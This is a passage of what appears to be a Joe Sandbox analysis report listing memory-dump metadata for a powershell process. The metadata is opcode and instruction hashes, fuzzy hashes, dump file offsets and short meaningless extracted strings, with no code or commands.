                                                                    • Opcode ID: 98cab5367129766d9043da44fa978b92b0a957b5af68757d63580348177a97db
                                                                    • Instruction ID: faadc0afd6b799c70ff6d8773b49653266651c4fd542a87f54410ded0ae698cd
                                                                    • Opcode Fuzzy Hash: 98cab5367129766d9043da44fa978b92b0a957b5af68757d63580348177a97db
                                                                    • Instruction Fuzzy Hash: 4FD10674A01249AFDF05CFA8D584A9DFBB2FF88310F248159E814AB365D735ED86CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 661bd4383b1f5a66e23bf76e425098523928caa783f927652f9bed45ebc9eb7e
                                                                    • Instruction ID: 4649cd711f45eddcc4f6880cd598e9583e34d2d39999502c98214aa9744be00f
                                                                    • Opcode Fuzzy Hash: 661bd4383b1f5a66e23bf76e425098523928caa783f927652f9bed45ebc9eb7e
                                                                    • Instruction Fuzzy Hash: 95B17EB0E00209DFDF18CFA8C98579EBBF1AF98314F148129E815EB354EB74A841CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e1cc7103abf306931b3b2e94bed0ad327dc686cb1ba41a11d6f562e227b9d30
                                                                    • Instruction ID: a28a5c545f9bbbbd1bcaaebcfcc6d0fb1fdbe64d12b167939579f5371ba81d02
                                                                    • Opcode Fuzzy Hash: 0e1cc7103abf306931b3b2e94bed0ad327dc686cb1ba41a11d6f562e227b9d30
                                                                    • Instruction Fuzzy Hash: EFB15CB0E00209DFDF14CFA8D98579EBBF1AF88354F148529E814EB354EB74A985CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86a2cde44d6e43c9a8669d9ab1716306123bbe61d7df91188a0f6e7403f4a946
                                                                    • Instruction ID: 536fd7909fedcc50c947d7d3f1d15593e09658c562802dd14402de2b0dc53e33
                                                                    • Opcode Fuzzy Hash: 86a2cde44d6e43c9a8669d9ab1716306123bbe61d7df91188a0f6e7403f4a946
                                                                    • Instruction Fuzzy Hash: 3CA17C75A002089FDF14EFA5C944A9EBBB6FFD4304F118559E806AB369EB34BD49CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a73839c368c1f524c43578141e2c5c08b77a492ee8b5ba9ba8d21a4c3c8cd82a
                                                                    • Instruction ID: a2b940aa072bb545efd40fc9d3b8eb76b16f89bc9781e0adadad50d0076721d7
                                                                    • Opcode Fuzzy Hash: a73839c368c1f524c43578141e2c5c08b77a492ee8b5ba9ba8d21a4c3c8cd82a
                                                                    • Instruction Fuzzy Hash: 6891C238B012049FCB15EF69D844AAEBBF2FF89310F148569E4459B762DB35EC85CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ece0fb2670516b80b30fccf74d3d27bda9c1e3e15fde68dd02e5132f7d6fc4cb
                                                                    • Instruction ID: 8d904ec42f76b88cb5b8c6d99458e8c57afd6dbff89816c62d186457399312ef
                                                                    • Opcode Fuzzy Hash: ece0fb2670516b80b30fccf74d3d27bda9c1e3e15fde68dd02e5132f7d6fc4cb
                                                                    • Instruction Fuzzy Hash: D191ACB4A006058FCB05CF99C4949BEFBB1FF89310B2485AAE515AB3A5D735FC51CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 716e16cd1ecaf2ea33fda92ebba2bd7a2fb9bdb19e59ac53e38707f9baba6049
                                                                    • Instruction ID: b43a87350f8338b600f9bc5f5f7c334a8e6672221dbfe5b1ca09e7670c043e1b
                                                                    • Opcode Fuzzy Hash: 716e16cd1ecaf2ea33fda92ebba2bd7a2fb9bdb19e59ac53e38707f9baba6049
                                                                    • Instruction Fuzzy Hash: D4913BB8B10215DFCB54CB58C551A9ABBF2EF89324F15C46AE905AF351C732EC42CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 264af2954e949db4dd6132826364806719d1bd772cf8de12cb841906f473a794
                                                                    • Instruction ID: d2e589aae695c6dec522081642b3b6e648e416b012262a1c62b11d82f30c8bbf
                                                                    • Opcode Fuzzy Hash: 264af2954e949db4dd6132826364806719d1bd772cf8de12cb841906f473a794
                                                                    • Instruction Fuzzy Hash: E9812AB8A10215DFCB54CF58C591A9ABBF2EF89324F15C46AE905AB355CB32EC42CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ec9160d2ce33c565383ccaf839cf08d78fe722f1696dd3a65f55e26e055f12c
                                                                    • Instruction ID: 47582e460920ad826eeae7305906fae4bd01babf4e91b0b57ccd3852b0aefd9a
                                                                    • Opcode Fuzzy Hash: 5ec9160d2ce33c565383ccaf839cf08d78fe722f1696dd3a65f55e26e055f12c
                                                                    • Instruction Fuzzy Hash: BE71BF70A002098FDB14DF69C880A9EBBF6FF85314F14856AD405EB755EB75EC4ACB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dfa41ba4ea482c31de79c16542e1ff7a4cdd17db702adc8d6e43dde5370908b2
                                                                    • Instruction ID: 73884bd2632354642401bb7445df500a6378f81239ae732dc8dc83c06d661c71
                                                                    • Opcode Fuzzy Hash: dfa41ba4ea482c31de79c16542e1ff7a4cdd17db702adc8d6e43dde5370908b2
                                                                    • Instruction Fuzzy Hash: FA710870A402189FDF14DFB5D594BAEBBF2BF88304F148429D412AB764EB75AC49CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb36d5d2b9ad0436838edbf56bf4ba46ced3677a9cccd2b3e3a3e0b7a614823b
                                                                    • Instruction ID: 58683dc886404069fc603de1a2e143c5d135bbdf0218a94702ab8a834b374988
                                                                    • Opcode Fuzzy Hash: fb36d5d2b9ad0436838edbf56bf4ba46ced3677a9cccd2b3e3a3e0b7a614823b
                                                                    • Instruction Fuzzy Hash: 15714B71E00249DFDF14DFA9C8817DEBBF1AF88718F148529E414A7394EB74A885CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d9327cf474196c62496f59300280feb21995cefa208d85c848e7a7affff875e
                                                                    • Instruction ID: 284a5c232d1d1af0abb4d8a7f8e249823d9db340e817735161e6f06cfe01bba4
                                                                    • Opcode Fuzzy Hash: 2d9327cf474196c62496f59300280feb21995cefa208d85c848e7a7affff875e
                                                                    • Instruction Fuzzy Hash: DF714D71E00249DFDF14DFA9C88479EBBF2AF88718F148429E415A7394EB74A885CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fa1c740575037340f54f93ccb19411645d7b86e60258b7bbbade89b07dcc75c7
                                                                    • Instruction ID: cbf1f6e4b9c3c6d532b598300be67b0063d7d79dc4e585a6a6c18d224a7ab258
                                                                    • Opcode Fuzzy Hash: fa1c740575037340f54f93ccb19411645d7b86e60258b7bbbade89b07dcc75c7
                                                                    • Instruction Fuzzy Hash: 68612F7190E3D15FDB03DF6CC960499BFB0AF4721071A41D7D494DB2A3D629AC88CBA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20484c91653e202b0cada4391d08ec76f52e10c8f5a6b6f5845c2a9905f86f3e
                                                                    • Instruction ID: 00e6443c7c4ec00762e69b6bf3cef62ac15ea4c9db0359ce0e2a83851dad9b4d
                                                                    • Opcode Fuzzy Hash: 20484c91653e202b0cada4391d08ec76f52e10c8f5a6b6f5845c2a9905f86f3e
                                                                    • Instruction Fuzzy Hash: E75129B0A402099FEB18DFB5C844BAEBBF2FF84354F148429D406AB755EB75AC49CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ee006d5f1b69a4a49acc3ab3f51af934765bfa9fc5234b7dfd1dbe59faaf637
                                                                    • Instruction ID: b97fb469a9d394fdf77b0aa288573616aad8644ed52901f74fd74365e2ffeaec
                                                                    • Opcode Fuzzy Hash: 3ee006d5f1b69a4a49acc3ab3f51af934765bfa9fc5234b7dfd1dbe59faaf637
                                                                    • Instruction Fuzzy Hash: 3D416A716002008FEB189F74C958AAABBF2EFD9754F194069E406EB7A0DB38AC45CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea283b539999a01975ea0a3a044d20784dcff66d4e57bd3af58f8e07b9948bf3
                                                                    • Instruction ID: 75a14baedaef97f5a86ea4ee0b84d37046aa0cc831a929e51a9ea882bcfecfa7
                                                                    • Opcode Fuzzy Hash: ea283b539999a01975ea0a3a044d20784dcff66d4e57bd3af58f8e07b9948bf3
                                                                    • Instruction Fuzzy Hash: 9C414AB4A001058FCB05CF99C5A4DAAFBB1FF88310B25859AE5059B3A8D735FC50CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 883531eae06d641a4a3c945efc2e751aa6207605b517535d163f07b905ea5540
                                                                    • Instruction ID: 0b08024297a6038356b251de00e2b00d3a6aee30703e6e48da7a63c4a0a70fce
                                                                    • Opcode Fuzzy Hash: 883531eae06d641a4a3c945efc2e751aa6207605b517535d163f07b905ea5540
                                                                    • Instruction Fuzzy Hash: 75310475A00209AFCB14CF98C5809AEBBB1FF89310B258699E919EB751D331FC81CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a5407d19c5205c1787b94b3315f93a748f64c788c004e60cced84817dbc6a53
                                                                    • Instruction ID: 0195eae25a0e15001b1f74506c727617e90acabc564f2213a1f55994fe7f4fc3
                                                                    • Opcode Fuzzy Hash: 2a5407d19c5205c1787b94b3315f93a748f64c788c004e60cced84817dbc6a53
                                                                    • Instruction Fuzzy Hash: 9E310130B012588FDB269B74C8957EEB7B2AF89308F1144E9D409AB355DF35AE45CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a78b862edafb43746f9804095d888ba8156c9908e3de10294d81b4055e857509
                                                                    • Instruction ID: 92754c49cfe5c3b6990531a7f7b28462c7b03d4ed1c334469e5b1dd3559a54fd
                                                                    • Opcode Fuzzy Hash: a78b862edafb43746f9804095d888ba8156c9908e3de10294d81b4055e857509
                                                                    • Instruction Fuzzy Hash: D9215EB4A042099FCB00CF98D4809AEBBB5FF89300B14809AE915EB352D735FD41CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a770b99296a54f55b1ed5e98ab93b0fceb43f52dd634cb0af3b0733c643f8665
                                                                    • Instruction ID: c7836ccf5a9b276b5c14562a069bc8d5b2207d9e8318f9470172e64882326d4b
                                                                    • Opcode Fuzzy Hash: a770b99296a54f55b1ed5e98ab93b0fceb43f52dd634cb0af3b0733c643f8665
                                                                    • Instruction Fuzzy Hash: EB215C74A042098FCB04CF98D9809AEBBF5FF89310B1581AAE809EB351D731FD41CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2303918480.00000000044AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_44ad000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5da907521e0c239f53c7eadf4dacabb564853d0fafeeeb16e24512970f05d49e
                                                                    • Instruction ID: 39e73907b01fbf3ab4a57d31d3da6713d25d53bf30cc11aff585110425c8711d
                                                                    • Opcode Fuzzy Hash: 5da907521e0c239f53c7eadf4dacabb564853d0fafeeeb16e24512970f05d49e
                                                                    • Instruction Fuzzy Hash: 6A019E7140E3C09ED7128B258C94B56BFB4EF53228F0DC0DBD8888F6A3C2699849C772
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2303918480.00000000044AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_44ad000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea8219fdf2a1032d0efacec796e8f6bda8940b03251ba77c888e8ea5b6bca620
                                                                    • Instruction ID: fe94f10e971d35f97838f983eea64b0fb533f21b45664c5f1fb505d4d1d60446
                                                                    • Opcode Fuzzy Hash: ea8219fdf2a1032d0efacec796e8f6bda8940b03251ba77c888e8ea5b6bca620
                                                                    • Instruction Fuzzy Hash: 60012BB190C3409EEB204E29DD8476BBFD8EF51768F08C42BED484B646C279E842C6B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36231d440f18b9fa74c2e8edbfc56f4acc8035c61d24b81bebde458f9c885e46
                                                                    • Instruction ID: b8201f468eababf448344e3713ada0ba82d773aa6ba99b87c1f1ed1cb93d2fb3
                                                                    • Opcode Fuzzy Hash: 36231d440f18b9fa74c2e8edbfc56f4acc8035c61d24b81bebde458f9c885e46
                                                                    • Instruction Fuzzy Hash: C0F065BA609241DFD791CA00C950AD2BB72BF97205F1CC0DBD4188F296C7B5D846CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2303918480.00000000044AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_44ad000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b96761572771db94f47f1b0b01e42e961dfbb56f4c55e1ddf5d69a9d8beede18
                                                                    • Instruction ID: f3b7589937c820f96f7c1b168f11691e774dda6ed678810a48bf4ae0dacdbdfc
                                                                    • Opcode Fuzzy Hash: b96761572771db94f47f1b0b01e42e961dfbb56f4c55e1ddf5d69a9d8beede18
                                                                    • Instruction Fuzzy Hash: 0621F4B1A04200DFDF15DF14D9C1B27BF66FBA4324F24C56AD9090AA56C336F466CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$84~l$84~l$84~l$84~l$tPkq$tPkq$tPkq$tPkq$$kq$(qq$(qq$(qq$(qq
                                                                    • API String ID: 0-3624638530
                                                                    • Opcode ID: 1292d5169f1f646af3a85b552f727d0ece66fe069e519cdb911a170053f27020
                                                                    • Instruction ID: ac42ea402a6909100054b655a6c092f1ae26067ae38022c76292e218ff779bfc
                                                                    • Opcode Fuzzy Hash: 1292d5169f1f646af3a85b552f727d0ece66fe069e519cdb911a170053f27020
                                                                    • Instruction Fuzzy Hash: 24A108B574020ABFCB64DF55C5446FBBBA2BB85310F24845EE805AB394DB35EC41CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$tPkq$tPkq$#pk$$kq$$kq$$kq$$pk$vl$vl
                                                                    • API String ID: 0-3958255952
                                                                    • Opcode ID: 4b72b0a2916514b4b32492f32db63919b8d08515472ccc41b759c5c0fe9b9838
                                                                    • Instruction ID: 6b77b216b54eaa87b483303f5f6dc6b22c92be48fd2e5d5d1ad3f92970e68309
                                                                    • Opcode Fuzzy Hash: 4b72b0a2916514b4b32492f32db63919b8d08515472ccc41b759c5c0fe9b9838
                                                                    • Instruction Fuzzy Hash: 9CB148BA7042169FD761CA69C8016FBBBA7AFC2610F18846FD504CB391DB3ADC49C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$vl$vl$vl$vl
                                                                    • API String ID: 0-3270757047
                                                                    • Opcode ID: 65612d03bffb777bec58231583884bca90e4f9d599c79d423f110e147bd2947b
                                                                    • Instruction ID: b1511f7eefdad09abaf5cce2de4ef1bcd4c3b7910a7baf90220499464b94160c
                                                                    • Opcode Fuzzy Hash: 65612d03bffb777bec58231583884bca90e4f9d599c79d423f110e147bd2947b
                                                                    • Instruction Fuzzy Hash: DBF117B77042068FCB64CA6899016FBBBA3AFC6210F14846FD415CB751DB3AD94AC7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tpk$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$DUpk$$kq$$kq$$kq
                                                                    • API String ID: 0-2009220326
                                                                    • Opcode ID: 4b8bdb09a02ec6aff3610a511768cce6e8ff4940c15ab9a9f4d84fb4324859cf
                                                                    • Instruction ID: a3e23c23544a22a534f2a0ae962a928d48ab1289a69db29bfb9b0cfc9e7510c3
                                                                    • Opcode Fuzzy Hash: 4b8bdb09a02ec6aff3610a511768cce6e8ff4940c15ab9a9f4d84fb4324859cf
                                                                    • Instruction Fuzzy Hash: E9E105B9F042199FCB64CE28D9006EBBBA2AF85210F24C47FD405CB355DB35D845CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                    • API String ID: 0-3986695248
                                                                    • Opcode ID: cd3576ce6963303460bcb23d81c5c176f6ed97aad8e5010af91ad4de4b1a44e1
                                                                    • Instruction ID: 6f28e92eb9ce54555a75a63c87ed58fff5d6bae5da121fd4e4691733929bf269
                                                                    • Opcode Fuzzy Hash: cd3576ce6963303460bcb23d81c5c176f6ed97aad8e5010af91ad4de4b1a44e1
                                                                    • Instruction Fuzzy Hash: 6FC115B970020A9FDB64DA6989406FBBBA6BFC1210F24847FD605CB391DFB5D842C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq
                                                                    • API String ID: 0-1975867332
                                                                    • Opcode ID: bde11ad22c8f42ed38302b605c8ec41ef7596fc549e7971efd54429abd091f9d
                                                                    • Instruction ID: acb3f4d00c9a30c01c0ad265de9731c0d2531bbd6acc1bb407ef6fad018954be
                                                                    • Opcode Fuzzy Hash: bde11ad22c8f42ed38302b605c8ec41ef7596fc549e7971efd54429abd091f9d
                                                                    • Instruction Fuzzy Hash: 47A1F7F5B0020D9FCB64DA69C5406EBBBA3ABC5210F24C46FD4159B396EB32D942CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$84~l$84~l$84~l$tPkq$tPkq$tPkq$tPkq
                                                                    • API String ID: 0-238963363
                                                                    • Opcode ID: c5ee0d83b6d89e3e6443e245e05678e8f113f3af14d8ff452b6c188ccb360ecf
                                                                    • Instruction ID: be7b0b38028f8cecf65658cc23e5c25b1eeefc05c87930f8c5dcaaaa3b98b3dc
                                                                    • Opcode Fuzzy Hash: c5ee0d83b6d89e3e6443e245e05678e8f113f3af14d8ff452b6c188ccb360ecf
                                                                    • Instruction Fuzzy Hash: 2DA109B87002299FCB64DF59C5006BBBBA2BBC9310F18846EE9159F395DB36DC42C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-1955630381
                                                                    • Opcode ID: e7ed28a27857a8b78da98461870a3451be9e94ec1d7348ea728fe165f24ff21e
                                                                    • Instruction ID: 625d6be781ae24958cd01bb0bdc82df703ad7a13cc7920f2b904a3a3f8733ff2
                                                                    • Opcode Fuzzy Hash: e7ed28a27857a8b78da98461870a3451be9e94ec1d7348ea728fe165f24ff21e
